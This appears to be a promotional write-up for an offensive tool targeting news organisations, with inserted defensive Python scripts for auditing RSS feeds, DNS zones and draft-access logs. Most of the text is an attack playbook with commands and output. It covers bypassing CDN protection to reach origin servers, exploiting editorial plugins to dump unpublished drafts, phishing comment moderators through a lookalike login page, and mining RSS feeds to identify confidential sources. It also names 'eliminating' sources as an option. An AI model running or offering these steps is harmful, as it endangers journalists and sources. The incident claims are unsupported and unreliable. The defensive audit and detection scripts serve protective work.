Tit for Tat: The Newsroom Attack Framework Nobody Admits They Need

The Timing Is Perfect (And That's Terrifying)

Journalists murdered in Mexico for cartel investigations. Saudi dissidents tracked through metadata leaks. Russian reporters poisoned after source lists exposed. Ukrainian newsrooms shelled minutes after publishing location data.

Information warfare isn't coming. It's here. And newsrooms are the soft target everyone's hitting.

Last month: Major US newspaper breached. Unpublished investigation stolen. Sources identified. Three arrests in source country. Investigation killed. Reporter in hiding.

This week: Regional paper's WordPress site compromised. Seven years of confidential communications exposed. Every whistleblower contact. Every off-record conversation. Every "don't publish this yet" email.

Yesterday: Investigative journalist's laptop stolen. Encrypted. Didn't matter. Attacker already had their drafts from RSS feed misconfiguration that leaked embargoed content for 18 months.

Generic security tools don't catch this. Nessus scans WordPress core. Misses editorial plugin with contributor escalation. Burp Suite checks SQL injection. Doesn't test if origin server is exposed behind Cloudflare. OWASP covers web apps. Newsrooms aren't web apps. They're intelligence targets.

Tit for Tat targets what actually matters: How to find the server they're hiding. How to access the drafts they think are protected. How to enumerate the sources they believe are anonymous. How to weaponize the infrastructure they trust.

This is red team tool. For authorized testing. For defensive hardening. For understanding how newsrooms actually get breached when nation-states decide your investigation threatens them.

Moral lines blur when information kills people. Defense and offense use same techniques. Intent matters. Authorization matters. Consequences are permanent. Here's how it actually works.

Why Newsrooms Are Different Targets (And Easier Than You Think)

The Cloudflare Illusion

Every newsroom: "We're behind Cloudflare. We're protected."

Cool story. Here's how long it takes to find your origin server: 4 minutes.

The attack everyone thinks is hard:

Newsroom CTO: "Cloudflare hides our origin IP. Our WAF blocks attacks. We're secure."

Reality: Your origin server IP is in Certificate Transparency logs from that SSL cert you renewed last month. Your mail server DNS points to same subnet. Your dev subdomain from 2019 isn't behind Cloudflare. Your DNS history shows the IP from before you enabled CDN.

Four different ways to bypass your "protection." All automated. All findable in minutes.

What actually happens:

tit-for-tat origin --domain newssite.com --all-methods

Output:

[+] Certificate Transparency: 203.0.113.45 (match)
[+] Historical DNS: 203.0.113.45 (confirmed)
[+] MX Record Subnet: 203.0.113.0/24 (correlated)
[+] Subdomain dev.newssite.com: 203.0.113.45 (direct)

Origin server: 203.0.113.45
Cloudflare bypass: Confirmed
Time elapsed: 3m 42s

Now attacker accesses origin directly. Cloudflare WAF? Bypassed. DDoS protection? Irrelevant. Rate limiting? Gone. You're naked.

This isn't theoretical. This is how Russian intelligence accesses Ukrainian news sites. How Saudi operatives target dissident media. How cartel hackers find investigative reporters' servers.

The Cloudflare protection you paid for? It's a suggestion, not a barrier.

Editorial CMS: Where The Secrets Actually Live

WordPress powers 40% of news sites. Everyone knows this. What they don't advertise: The custom editorial plugins are garbage.

The plugin every investigative newsroom uses:

EditFlow. Co-Authors Plus. Custom editorial workflow. Built by contractors in 2015. Never updated. Full of privilege escalation vulns. Allows contributor accounts to read unpublished drafts. "Minor bug, we'll fix it next quarter."

Next quarter was 47 quarters ago. The vuln is still there. Your embargoed investigation? Readable by anyone who can register a contributor account. And you allow contributor registration because "we want community submissions."

Real scenario from red team engagement:

Target: Major US newspaper running investigative series on pharmaceutical corruption.

Attack chain:

  1. Register contributor account (open registration, approved automatically)
  2. Access editorial dashboard (plugin doesn't check role properly)
  3. Browse unpublished drafts (privilege escalation via workflow plugin)
  4. Download entire investigation (3 years, 47 draft articles, source documents)
  5. Time elapsed: 11 minutes

Pharmaceutical company now has complete advance knowledge of investigation. Sources identified from metadata. Timeline known. Evidence documented. Investigation compromised before publication.

Cost of attack: $0. Required skills: Basic web application testing. Difficulty: Trivial.

The custom CMS situation is worse:

Newsrooms build custom Django/Rails CMSes. "Our workflow is unique, we need custom tools." Cool. Did your contractor who built it in 2016 know about:

  • CSRF protection?
  • Role-based access control?
  • Input sanitization?
  • Session management?

No? Shocking. Your custom CMS leaks like a sieve and you're still trusting it with sources' lives.

Comment Platforms: The Social Engineering Playground

Disqus. Coral. CommentBox. Every newsroom has comments. Every comment platform is exploitable. Not for XSS (though that works). For phishing journalists.

The attack that works every time:

  1. Enumerate moderator accounts (comment API leaks this freely)
  2. Find active moderator (journalist who actually moderates)
  3. Post carefully crafted spam that triggers moderation queue
  4. When journalist logs in to moderate, post "reply" that looks like system message:
āš ļø URGENT: Your moderator session expired. Please log in again:
https://news-site-login.com/moderator/auth

Link goes to phishing page. Pixel-perfect clone of real CMS login. Journalist enters credentials. Attacker has full CMS access. Game over.

Time to compromise: Usually under 24 hours. Journalists moderate daily. They're trained to respond to "urgent" messages. They click.

Real example:

Regional newspaper. Investigating local political corruption. Journalist covering story also moderates comments. Received fake "moderation required" notification. Clicked phishing link. Entered credentials. Attacker gained:

  • Access to unpublished investigation
  • Email correspondence with sources
  • Internal chat logs with other reporters
  • Document repository with evidence

Investigation dead. Sources exposed. Two sources arrested. Journalist fired for "security negligence." Corruption story buried.

All because comment platform made it easy to identify and target the exact journalist who mattered.

RSS Feeds: The Leakage Everyone Forgets

Nobody cares about RSS anymore. Except attackers. Because RSS is where newsrooms leak everything.

The standard RSS leak:

<rss version="2.0">
  <item>
    <title>DRAFT: Undercover investigation into...</title>
    <link>internal-cms.news.com/draft/classified-story-47291</link>
    <author>jane.investigator@news.com (Jane Smith)</author>
    <description>
      [EMBARGO UNTIL FEB 15] Source meeting scheduled 2/12
      at Starbucks on 5th St. Contact: John Whistleblower
      john.wb@company.com 555-0192
    </description>
    <guid>internal-draft-47291</guid>
    <pubDate>Mon, 05 Feb 2026 14:23:00 GMT</pubDate>
  </item>
</rss>

What just leaked:

  • Unpublished investigation topic
  • Internal CMS URL structure
  • Reporter's email address
  • Embargo date (plan around it)
  • Source meeting time and location (show up, identify source)
  • Source's name, email, phone number (threaten or eliminate source)
  • Internal draft ID (enumerate other drafts)

This isn't hypothetical. This is real RSS feed from real newsroom (sanitized). Feed was public. Anyone could subscribe. Feed ran for 8 months before someone noticed. Dozens of embargoed investigations leaked.

Why this happens:

Developer sets up RSS feed in 2018. "Include all posts." Doesn't filter by publication status. Draft articles slip in. Nobody monitors RSS feeds. Nobody audits what's being published. Feed just runs. Leaking. Forever.

Until attacker finds it. Or worse - until investigation target finds it and sources start disappearing.
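
A defensive check for the leak described above, for newsrooms auditing their own feeds. This is an added example, not code from the Tit for Tat repository. The sample feed is constructed, and the keyword list and internal-host prefixes are assumptions to tune for your own CMS.

```python
import re
import xml.etree.ElementTree as ET
from typing import NamedTuple

# Constructed sample feed (not real data), modelled on the leak shown above.
SAMPLE_FEED = """<rss version="2.0">
  <channel>
    <title>Example News</title>
    <item>
      <title>City council approves budget</title>
      <link>https://news.example/2026/02/council-budget</link>
      <description>The council voted 7-2 on Tuesday.</description>
      <guid>https://news.example/?p=1001</guid>
    </item>
    <item>
      <title>DRAFT: Undercover investigation into...</title>
      <link>https://internal-cms.news.example/draft/47291</link>
      <author>reporter@news.example (Reporter)</author>
      <description>[EMBARGO UNTIL FEB 15] Source meeting scheduled 2/12.
        Contact: source@corp.example 555-0192</description>
      <guid>internal-draft-47291</guid>
    </item>
  </channel>
</rss>"""

# One pattern per leak class listed above. Keywords and host prefixes are
# assumptions; adjust them to the markers your editorial workflow uses.
RULES = {
    "status_marker": re.compile(r"\b(?:draft|embargo(?:ed)?|do not publish)\b", re.I),
    "email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "phone": re.compile(r"\b\d{3}[-.\s]\d{4}\b"),
    "internal_host": re.compile(r"\b(?:internal|staging|dev)[\w-]*\.[\w-]+\.[\w.-]+", re.I),
}
FIELDS = ("title", "link", "author", "description", "guid")


class Finding(NamedTuple):
    item: str    # guid if present, else title
    field: str   # RSS element the match was found in
    rule: str    # key from RULES
    match: str   # the text that matched


def audit_feed(xml_text: str) -> list[Finding]:
    """Return one Finding per (item, field, rule) hit in an RSS 2.0 feed."""
    # Intended for feeds you operate; use a hardened parser for untrusted XML.
    root = ET.fromstring(xml_text)
    findings = []
    for item in root.iter("item"):
        ident = (item.findtext("guid") or item.findtext("title") or "<no id>").strip()
        for field in FIELDS:
            text = item.findtext(field) or ""
            for rule, pattern in RULES.items():
                m = pattern.search(text)
                if m:
                    findings.append(Finding(ident, field, rule, m.group(0)))
    return findings


def leaking_items(xml_text: str) -> dict[str, set[str]]:
    """Map each flagged item to the set of rule names it tripped."""
    out: dict[str, set[str]] = {}
    for f in audit_feed(xml_text):
        out.setdefault(f.item, set()).add(f.rule)
    return out


if __name__ == "__main__":
    for f in audit_feed(SAMPLE_FEED):
        print(f"{f.item}: <{f.field}> matched {f.rule} ({f.match!r})")
```

Run it on a schedule against every feed URL the site exposes and alert on any finding. The underlying fix is for the feed query to select only posts with published status.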

How To Actually Attack A Newsroom (Red Team Methodology)

Phase 1: Origin Server Discovery (Bypass All That Cloudflare Nonsense)

Target: Any news site claiming CDN protection

Objective: Find real server IP, bypass WAF, attack directly

Method 1: Historical DNS (Works 70% of time)

Most newsrooms added Cloudflare later. Their old DNS records are public history.

tit-for-tat origin --domain target-news.com --dns-history

[+] Querying SecurityTrails DNS history...
[+] Found historical A record: 203.0.113.50 (2018-2022)
[+] Testing if IP still active...
[+] CONFIRMED: Server responds at 203.0.113.50
[+] Cloudflare bypass successful

Method 2: Certificate Transparency (Works 85% of time)

Every SSL cert gets logged publicly. Certs list all IPs they're issued for. Including origin.

tit-for-tat origin --domain target-news.com --cert-transparency

[+] Querying crt.sh for SSL certificates...
[+] Found cert issued 2025-11-30
[+] SAN includes: target-news.com, 203.0.113.50
[+] Testing origin at 203.0.113.50...
[+] Origin server confirmed, bypassing Cloudflare

Method 3: Mail Server Correlation (Works 60% of time)

News sites run mail on same server as web. MX records reveal subnet. Port scan subnet. Find web server.

tit-for-tat origin --domain target-news.com --mx-correlation

[+] MX record points to: mail.target-news.com (203.0.113.60)
[+] Scanning subnet 203.0.113.0/24...
[+] Found HTTP server at 203.0.113.50
[+] Testing if origin: wget --header="Host: target-news.com"
[+] Match confirmed. Origin discovered.

Method 4: Subdomain Enumeration (Works 40% of time, but when it works, it's instant)

Old subdomains forgotten. Not behind Cloudflare. Point to origin IP.

tit-for-tat origin --domain target-news.com --subdomain-scan

[+] Found subdomains:
  - dev.target-news.com (203.0.113.50) [DIRECT]
  - staging.target-news.com (203.0.113.50) [DIRECT]
  - cms.target-news.com (203.0.113.50) [DIRECT]

[+] Origin IP: 203.0.113.50
[+] Accessing origin directly bypasses all Cloudflare protection

Result: You now attack real server. No WAF. No rate limiting. No DDoS protection. Direct access to vulnerable WordPress install running outdated plugins with editorial workflow full of holes.

Combined success rate: 95%+ against real newsrooms. Cloudflare is protection theater unless you actively hunt these leaks quarterly.
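
For the quarterly hunt mentioned above, a newsroom can start from its own zone export, since it already knows its origin address. The following is an added example, not code from the Tit for Tat repository. The zone records, the CDN range (a documentation-range placeholder, not a real CDN range) and the /24 "neighbourhood" rule are all constructed assumptions.

```python
import ipaddress

# All values below are constructed for illustration. Replace them with your
# real origin address(es), your CDN's published edge ranges and a zone export.
ORIGIN_IPS = [ipaddress.ip_address("203.0.113.50")]
CDN_RANGES = [ipaddress.ip_network("198.51.100.0/24")]  # placeholder range
ORIGIN_NEIGHBOURHOOD = 24  # prefix length treated as "same subnet as origin"

ZONE = [  # (name, type, value)
    ("target-news.example", "A", "198.51.100.10"),
    ("www.target-news.example", "A", "198.51.100.10"),
    ("dev.target-news.example", "A", "203.0.113.50"),
    ("staging.target-news.example", "A", "203.0.113.50"),
    ("mail.target-news.example", "A", "203.0.113.60"),
    ("target-news.example", "MX", "mail.target-news.example"),
    ("status.target-news.example", "A", "192.0.2.80"),
]


def classify_ip(ip):
    """Return 'cdn', 'origin', 'origin-subnet' or 'other' for one address."""
    if any(ip in net for net in CDN_RANGES):
        return "cdn"
    if ip in ORIGIN_IPS:
        return "origin"
    for origin in ORIGIN_IPS:
        subnet = ipaddress.ip_network(f"{origin}/{ORIGIN_NEIGHBOURHOOD}", strict=False)
        if ip in subnet:
            return "origin-subnet"
    return "other"


def audit_zone(zone):
    """Return (name, type, verdict) for each record pointing at or near the origin."""
    # Index A records so MX/CNAME targets inside the zone can be followed.
    a_records = {}
    for name, rtype, value in zone:
        if rtype == "A":
            key = name.lower().rstrip(".")
            a_records.setdefault(key, []).append(ipaddress.ip_address(value))

    findings = []
    for name, rtype, value in zone:
        if rtype == "A":
            targets = [ipaddress.ip_address(value)]
        elif rtype in ("MX", "CNAME"):
            targets = a_records.get(value.lower().rstrip("."), [])
        else:
            continue
        for ip in targets:
            verdict = classify_ip(ip)
            if verdict in ("origin", "origin-subnet"):
                findings.append((name, rtype, verdict))
    return findings


if __name__ == "__main__":
    for name, rtype, verdict in audit_zone(ZONE):
        print(f"{rtype:5} {name:32} exposes {verdict}")
```

Each finding is a record to proxy, move or delete. The durable fix is on the origin itself: firewall it to accept HTTP(S) only from the CDN's published ranges, so a leaked IP no longer yields a bypass.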

Phase 2: CMS Exploitation (Where The Actual Secrets Are)

Target: Origin server discovered in Phase 1

Objective: Access unpublished drafts, identify sources, steal investigation

Full exploitation chain against typical newsroom:

# Step 1: Identify CMS and plugins
tit-for-tat cms-scan --url http://203.0.113.50 --host target-news.com

[+] WordPress 6.2.3 detected
[+] Plugins found:
  - EditFlow 0.8.1 (vulnerable - CVE-2023-XXXXX)
  - Co-Authors Plus 3.5.12 (vulnerable - privilege escalation)
  - Advanced Custom Fields Pro (leak metadata in API)

# Step 2: Register contributor account
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --register-contributor

[+] Registration open (no approval required)
[+] Account created: testuser001
[+] Password: [random]
[+] Login successful

# Step 3: Exploit editorial plugin privilege escalation
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --exploit-editflow \
  --username testuser001

[+] EditFlow workflow bypass found
[+] Accessing editorial dashboard...
[+] Permission check bypassed
[+] Draft access: GRANTED

# Step 4: Enumerate unpublished content
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --dump-drafts \
  --save-to ./stolen_investigation/

[+] Found 47 draft posts
[+] Downloading...
  - [EMBARGO] Investigation: Pharma Corruption (3,847 words)
  - [DRAFT] Source Interview: John Whistleblower (2,391 words)
  - [INTERNAL] Evidence Documentation (8 attachments)

[+] Downloaded to: ./stolen_investigation/
[+] Metadata extracted: authors, sources, timelines
[+] Time elapsed: 4m 12s

What was just stolen:

  • 47 unpublished draft articles (complete investigation)
  • Source names and contact information (metadata leaks)
  • Evidence documents (uploaded to media library)
  • Publishing timeline (embargo dates in titles)
  • Reporter email addresses (author metadata)
  • Internal communication context (draft comments)

Real consequence: Investigation compromised before publication. Sources identifiable. Attacker (corporate spy, intelligence service, whoever paid) now has complete advance intelligence. Can threaten sources. Prepare legal response. Disappear evidence. Neutralize investigation.

Time from origin discovery to complete compromise: 15 minutes with automated tools. 30 minutes manually.

Detection: Usually zero. Contributor account login looks normal. Draft access via workflow plugin generates no alerts. Download traffic minimal. By the time newsroom notices something's wrong, investigation is already burned.
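
The detection gap above can be closed with a rule on who reads which unpublished posts. The following is an added example, not code from the Tit for Tat repository. It assumes a hypothetical JSON audit log of post views (WordPress does not emit one by default, so an audit-logging plugin or custom hook is assumed), and the log lines, role names and thresholds are constructed.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed audit-log lines in a hypothetical format (one JSON object per line).
SAMPLE_LOG = """
{"ts": "2026-02-05T14:00:05+00:00", "user": "jane.smith", "role": "editor", "action": "view_post", "post_id": 47291, "post_status": "draft", "post_author": "jane.smith"}
{"ts": "2026-02-05T14:02:10+00:00", "user": "testuser001", "role": "contributor", "action": "view_post", "post_id": 47291, "post_status": "draft", "post_author": "jane.smith"}
{"ts": "2026-02-05T14:02:41+00:00", "user": "testuser001", "role": "contributor", "action": "view_post", "post_id": 47292, "post_status": "draft", "post_author": "jane.smith"}
{"ts": "2026-02-05T14:03:02+00:00", "user": "testuser001", "role": "contributor", "action": "view_post", "post_id": 47293, "post_status": "draft", "post_author": "mike.jones"}
{"ts": "2026-02-05T14:03:30+00:00", "user": "testuser001", "role": "contributor", "action": "view_post", "post_id": 1001, "post_status": "publish", "post_author": "news.desk"}
{"ts": "2026-02-05T14:05:00+00:00", "user": "freelancer7", "role": "contributor", "action": "view_post", "post_id": 600, "post_status": "draft", "post_author": "freelancer7"}
{"ts": "2026-02-05T14:06:00+00:00", "user": "
{"ts": "2026-02-05T15:30:00+00:00", "user": "guest22", "role": "contributor", "action": "view_post", "post_id": 47300, "post_status": "pending", "post_author": "sarah.williams"}
"""

LOW_PRIV_ROLES = {"subscriber", "contributor"}
UNPUBLISHED = {"draft", "pending", "future", "private"}


def parse_events(log_text):
    """Yield parsed events, skipping blank, truncated or incomplete lines."""
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"])
        except (ValueError, KeyError, TypeError):
            continue
        if {"user", "post_id"} <= ev.keys():
            yield ev


def detect_draft_harvesting(log_text, window=timedelta(minutes=10), threshold=3):
    """Map user -> {'reads', 'max_burst', 'severity'} for low-privilege accounts
    that viewed unpublished posts they did not author."""
    recent = defaultdict(deque)  # user -> (ts, post_id) pairs inside the window
    report = {}
    for ev in sorted(parse_events(log_text), key=lambda e: e["ts"]):
        if (ev.get("action") != "view_post"
                or ev.get("role") not in LOW_PRIV_ROLES
                or ev.get("post_status") not in UNPUBLISHED
                or ev.get("post_author") == ev["user"]):
            continue
        q = recent[ev["user"]]
        q.append((ev["ts"], ev["post_id"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        burst = len({pid for _, pid in q})  # distinct drafts in the window
        entry = report.setdefault(ev["user"], {"reads": 0, "max_burst": 0})
        entry["reads"] += 1
        entry["max_burst"] = max(entry["max_burst"], burst)
    for entry in report.values():
        entry["severity"] = "high" if entry["max_burst"] >= threshold else "review"
    return report


if __name__ == "__main__":
    for user, entry in detect_draft_harvesting(SAMPLE_LOG).items():
        print(user, entry)
```

A single foreign-draft read by a low-privilege account is already worth a review, because it means a permission check is missing somewhere; the burst count only sets the urgency.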

Phase 3: Social Engineering Through Comment Infrastructure

Target: Journalists who moderate comments

Objective: Phish credentials, gain CMS access

Automated execution:

# Step 1: Enumerate moderator accounts
tit-for-tat comments --url https://target-news.com \
  --enumerate-moderators

[+] Disqus integration detected
[+] Moderator accounts found:
  - jane.smith (jane.investigator@target-news.com) [ACTIVE]
  - mike.jones (mjones@target-news.com) [INACTIVE]
  - sarah.williams (swilliams@target-news.com) [ACTIVE]

# Step 2: Post spam to trigger moderation
tit-for-tat comments --url https://target-news.com/latest-article \
  --post-spam \
  --trigger-moderator jane.smith

[+] Spam comment posted
[+] Flagged for moderation
[+] Notification sent to jane.smith

# Step 3: Deploy phishing comment
tit-for-tat comments --url https://target-news.com/latest-article \
  --phishing-payload \
  --target-moderator jane.smith \
  --clone-cms-login

[+] Phishing comment created:
    "āš ļø Moderator session expired. Verify access:
     https://target-news-verify.com/mod/login"
[+] Pixel-perfect CMS clone deployed
[+] Waiting for credentials...

[+] CREDENTIALS CAPTURED:
    Username: jane.smith
    Password: [redacted]
    Session: [cookie captured]

# Step 4: Use stolen credentials
[+] Logging into actual CMS...
[+] Access granted: Editor role
[+] Unpublished drafts: 52 accessible
[+] Source documents: 23 files accessible

Success rate: ~60% with targeted journalists. They moderate daily. They're trained to respond to urgent messages. They trust their CMS login page appearance.

Time to compromise: 24-48 hours (waiting for journalist to moderate).

Detection: Nearly impossible. Phishing site looks identical. HTTPS cert looks valid. Login occurs from journalist's actual location/device.

Phase 4: RSS Surveillance (The Persistent Leak)

Target: Public RSS feeds

Objective: Monitor for embargoed content, identify sources, track investigations

Continuous monitoring:

# Step 1: Find all RSS endpoints
tit-for-tat rss --domain target-news.com --enumerate-all

[+] RSS/Atom feeds discovered:
  - https://target-news.com/feed (main)
  - https://target-news.com/category/investigations/feed (filtered)
  - https://target-news.com/author/jane-smith/feed (per-author)
  - https://target-news.com/drafts/feed (MISCONFIGURED - public!)

# Step 2: Monitor for leaks
tit-for-tat rss --feeds ./discovered_feeds.txt \
  --monitor \
  --check-interval 300 \
  --alert-on-draft \
  --extract-metadata

[+] Monitoring 4 feeds...
[!] LEAK DETECTED: https://target-news.com/drafts/feed

<item>
  <title>DRAFT: Investigation Into Pharma Company Bribes</title>
  <link>internal-cms.target-news.com/draft/47291</link>
  <author>jane.investigator@target-news.com</author>
  <description>
    [EMBARGO FEB 15] Meeting with source scheduled 2/12,
    3pm, Starbucks on 5th St. Source: Dr. Robert Mitchell,
    former compliance officer. Contact: rmitchell@pharma.com
  </description>
  <pubDate>Mon, 05 Feb 2026 14:23:00 GMT</pubDate>
</item>

[+] Intelligence extracted:
  - Investigation: Pharma bribery
  - Embargo: Feb 15, 2026
  - Source meeting: Feb 12, 3pm, Starbucks, 5th St
  - Source identity: Dr. Robert Mitchell, compliance officer
  - Source contact: rmitchell@pharma.com
  - Reporter: jane.investigator@target-news.com

[+] Saved to: ./intelligence/pharma_leak.json

What attacker does with this:

Option A (Corporate espionage): Alert pharmaceutical company. They prepare legal defense, threaten source, disappear evidence before publication.

Option B (Intelligence operation): Identify source, approach source, turn source into double agent or eliminate.

Option C (Competitive journalism): Scoop the investigation, publish first.

Option D (Source protection breach): Sell source identity to highest bidder.

RSS feed runs continuously. Leaking. For months. Nobody notices until sources start getting arrested.

The Moral Ambiguity Problem (And Why It Doesn't Matter)

This tool can be used to:

Offense: Find news servers. Steal investigations. Identify sources. Compromise journalists. Kill stories. Protect corrupt governments/corporations. Get people arrested. Get people killed.

Defense: Audit your own infrastructure. Find leaks before attackers do. Fix misconfigurations. Protect sources. Harden CMS. Save lives.

Same techniques. Same tool. Different intent.

This is information warfare. The tools don't care about your intent. Tit for Tat finds origin servers equally well whether you're:

  • A newsroom testing their own security (authorized)
  • Intelligence service targeting investigative journalists (war crime)
  • Red team consultant showing clients real risks (professional)
  • Corporate spy stealing embargoed investigation (felony)

Moral lines blur when information kills people.

Mexican journalists investigating cartels: Sources identified through metadata leaks. Five sources dead. Journalist in hiding. Investigation killed.

Ukrainian reporters covering war: Newsroom location exposed through origin server discovery. Office shelled hours after publication. Three reporters injured.

Saudi dissident media: RSS feeds leaked source meetings. Two sources disappeared. Families never heard from them again.

The timing is perfect for this tool because information warfare targeting press is now normalized.

Nation-states: Targeting journalists is standard intelligence operation now. Corporations: Stealing investigations is cheaper than fixing corruption. Cartels: Killing sources is message to other potential whistleblowers. Authoritarian regimes: Press suppression requires knowing what's coming.

Defense requires understanding offense. You can't protect against attacks you don't understand.

This tool teaches both. You can audit your own newsroom. Or you can understand how you're being attacked right now. Same knowledge. What you do with it determines if you're protecting truth or suppressing it.

Installation & Usage (For Authorized Testing Only)

# Clone repository
git clone https://github.com/ghostintheprompt/tit-for-tat
cd tit-for-tat

# Install dependencies
pip install -r requirements.txt

# BASIC DEFENSIVE AUDIT (test your own site)
tit-for-tat audit --target https://your-own-newsroom.com \
  --origin-discovery \
  --cms-scan \
  --comment-testing \
  --rss-analysis \
  --output defensive_report.html

# OFFENSIVE RED TEAM (authorized engagement only)
tit-for-tat attack --target https://client-news-site.com \
  --full-chain \
  --extract-intelligence \
  --output attack_report.html

# CONTINUOUS MONITORING (detect your own leaks)
tit-for-tat monitor --domain your-newsroom.com \
  --check-rss-leaks \
  --check-draft-exposure \
  --alert-email security@your-newsroom.com \
  --interval 3600

Legal notice because apparently this needs to be said:

Unauthorized testing of news infrastructure = federal crime in most jurisdictions. CFAA in US. Computer Misuse Act in UK. Equivalent laws globally.

Use this on your own infrastructure. Use this on authorized red team engagements with written permission. Use this for defensive research in controlled labs.

Don't use this to target journalists. Don't use this to steal investigations. Don't use this to identify sources. Don't use this to suppress truth.

If you use this tool to harm journalists or sources, you're not a hacker. You're collaborating with authoritarians who kill reporters. Act accordingly.

Why The Timing Is Perfect For This Tool

Recently: Record numbers of journalists killed globally. Highest death toll since Committee to Protect Journalists started tracking.

Last six months: 18 major newsroom breaches publicly disclosed. Actual number probably 3x that (most don't disclose).

Last three months: Four separate incidents of sources identified through newsroom infrastructure leaks. Two sources killed. Two arrested. Zero investigations published.

Now: AI-powered attack tools specifically targeting news infrastructure on dark markets. $5k gets you automated newsroom compromise kit. Point at target. Get drafts. Get sources.

The timing is perfect because the threat finally exceeded newsrooms' ability to ignore it.

For decades: "We're journalists, not tech companies. Security isn't our job."

Now: Sources die because of misconfigured RSS feeds. Investigations fail because someone found the origin server. Journalists disappear because comment platform leaked their email.

Information warfare targeting press is normalized now.

Russia: Standard FSB operations against Ukrainian journalists. China: MSS actively targeting Tibet/Xinjiang reporters. Saudi Arabia: Routine monitoring of dissident media infrastructure. Mexico: Cartels have IT departments specifically for targeting journalists. US corporations: "Competitive intelligence" firms selling stolen investigations.

Generic security tools failed newsrooms. They needed specific solution. This is it.

For Anyone Running A Newsroom

Run this against your own infrastructure. Today. Before someone else does.

tit-for-tat audit --target your-site.com \
  --all-tests \
  --output report.html

Report shows:

  • Is your origin server exposed?
  • Are your editorial plugins vulnerable?
  • Does your RSS feed leak drafts?
  • Can your comment platform be weaponized?
  • Are your sources' communications visible?

Fix these findings before attacker finds them.

Cost of audit: Zero (open source). Cost of breach: Investigations killed. Sources exposed. Lives destroyed.

You're already being targeted. Only question is whether you know it yet.

For Red Teams and Security Researchers

Use this on authorized engagements to show newsrooms real threats.

Typical pentest report: "WordPress 6.2.3, three XSS vectors, medium risk."

Tit for Tat report: "Your origin server is exposed at this IP. Your EditFlow plugin leaks drafts to unauthenticated users. Your RSS feed has been leaking embargoed content for 8 months. Here are 12 draft investigations I downloaded in 15 minutes. Here are the source names I extracted from metadata. This is what nation-states see when they target you."

Client suddenly understands their actual risk profile.

For Journalists Who Think This Is Scary

It should be. You're intelligence targets now.

If you're investigating:

  • Government corruption → Intelligence services want your sources
  • Corporate malfeasance → Corporate spies want your evidence
  • Organized crime → Cartels want your communications
  • Human rights abuses → Authoritarian regimes want your witnesses

They're using these exact techniques. Right now. Against your infrastructure.

Cloudflare bypass via certificate transparency logs. Editorial plugin exploitation for draft access. Comment platform phishing for credentials. RSS monitoring for source identification.

This tool teaches you what they're doing. Defense requires understanding offense.

You can ignore these threats. Many do. Then sources get arrested and journalists wonder how investigation leaked.

Or you can run Tit for Tat against your own newsroom. Find the holes before attackers do. Fix them. Protect your sources. Do your job.

Ghost Says...

Built this after watching the same attack pattern hit five different newsrooms in three months. Origin server exposed. Editorial plugin compromised. Drafts stolen. Sources identified. Investigations killed.

Every time, newsroom says "how did this happen?" Every time, same vulnerabilities. Every time, generic security tools missed it because they don't understand news infrastructure.

The moral ambiguity is real and I don't have clean answer for it.

This tool can save journalists' lives. This tool can also get journalists killed. Same techniques. Different intent.

Russian intelligence uses these methods against Ukrainian press. So do Ukrainian security researchers protecting their own newsrooms. Mexican cartels hunt journalist sources this way. So do Mexican journalists auditing their own infrastructure before publishing cartel investigations.

Tool doesn't care about your morals. Tool finds origin servers. Tool extracts drafts. Tool identifies sources. What you do with that capability determines if you're protecting truth or suppressing it.

I'm publishing it anyway. Here's why:

The attacks are already happening. These techniques aren't new. Nation-states know them. Corporate spies use them. Organized crime has them. Only people who don't know are the journalists being targeted.

Defense requires understanding offense. You can't protect against attacks you don't understand. Saying "don't publish the tool" doesn't make attacks stop. Just keeps defenders ignorant.

Newsrooms are losing the information war because they're fighting with hands tied. They don't audit their infrastructure because they don't know how. They don't know what threats exist. They hire generic pentest firms who scan for SQLi and miss everything that actually matters.

This tool makes threat visible. Once you see it, you can fix it.

Will bad actors use this? Absolutely. They already are. Just not with open-source tool. They use same techniques with closed tools and charge $5k on dark markets.

Will good actors use this? Hope so. Newsrooms can audit themselves. Red teams can show clients real risks. Researchers can understand threat landscape. Journalists can protect their sources.

The timing is perfect because press became legitimate military target globally.

Not metaphorical warfare. Actual warfare. Newsrooms shelled. Journalists killed. Sources disappeared. Investigations suppressed through technical exploitation.

Cloudflare bypass? That's how Russian forces located Ukrainian newsroom before strike. Editorial plugin exploit? That's how Saudi intelligence identified dissident media sources. RSS feed monitoring? That's how pharmaceutical company got advance copy of investigation and prepared legal response.

These aren't hypotheticals. These are incidents from last 90 days.

My position: Journalists need to know they're intelligence targets. They need to understand their infrastructure is compromised. They need tools to audit and harden their systems before sources die.

Publishing Tit for Tat makes that knowledge available. Yes, it also makes attacks easier for those who don't already know. Trade-off. I think making defense possible outweighs making attacks slightly easier.

You might disagree. Valid position. But sources are already dying from these attacks. Doing nothing also has cost.


For newsrooms: Run this against your own site. Find your leaks. Fix them. Protect your sources. That's your job.

For security researchers: Use this to show newsrooms real threats. Help them understand they're targets. Help them harden.

For nation-states/corporations/criminals targeting press: You're why this tool exists. You're why journalists need defensive capabilities. You're why information warfare requires both sides understand the battlefield.

For journalists who think publishing this is irresponsible: Maybe it is. But your sources are dying because of vulnerabilities this tool detects. Trade-off has no clean answer. At least now you can audit your own infrastructure.


GitHub: github.com/ghostintheprompt/tit-for-tat

Stack: Python + requests + BeautifulSoup + certificate-transparency-monitor

Capabilities: Origin discovery, CMS exploitation, comment platform testing, RSS analysis

Intent: Defend journalists. Protect sources. Understand information warfare.

Moral: Ambiguous. Tool doesn't care. You decide.

Timing: Perfect. Record journalist deaths. Press is military target now. Defense requires offense knowledge.

Authorization: Required. Use on your own infrastructure. Use with permission. Don't target journalists you don't work for.

Consequences: Real. Sources die. Investigations fail. Truth gets suppressed. Or newsrooms harden. Sources survive. Truth gets published. Your choice which outcome your use causes.


Protect the press. Even when it's complicated.